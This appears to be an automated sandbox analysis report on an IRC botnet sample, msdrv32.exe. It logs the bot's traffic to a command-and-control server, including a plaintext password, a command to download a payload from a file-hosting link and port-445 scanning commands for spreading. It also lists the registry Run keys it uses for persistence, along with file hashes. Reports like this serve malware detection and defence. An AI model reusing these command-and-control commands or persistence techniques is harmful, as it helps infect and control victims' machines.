Server : s3.com [Crew]

Remote Host Port Number
69.42.218.72 1863

MODE [00_USA_XP_3307080] -ix
JOIN #dam open
PRIVMSG #t :HTTP SET http://rapidshare.com/files/339293902/newb
PRIVMSG #dam :scan// Trying to get external IP.
PRIVMSG #dam :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.
PRIVMSG #dam :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 3 seconds for 0 minutes using 15 threads.
NICK [00_USA_XP_3307080]
USER SP2-363 * 0 :COMPUTERNAME

* There was outbound traffic produced on port 1863: PASS letmein

Other details

* The following ports were open in the system:

Port Protocol Process
1055 TCP msdrv32.exe (%Windir%\msdrv32.exe)
1056 TCP msdrv32.exe (%Windir%\msdrv32.exe)
1349 TCP msdrv32.exe (%Windir%\msdrv32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\msdrv32.exe"

so that msdrv32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\msdrv32.exe"

so that msdrv32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
msdrv32.exe %Windir%\msdrv32.exe 339 968 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash
1 %Windir%\logfile32.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
  SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709
2 %Windir%\msdrv32.exe 50 688 bytes MD5: 0xB276061AB725FA6B264A0DADC86CBE6B
  [file and pathname of the sample #1]
  SHA-1: 0x20AF7611A328B4323DE6988EC757761EEF8054E3
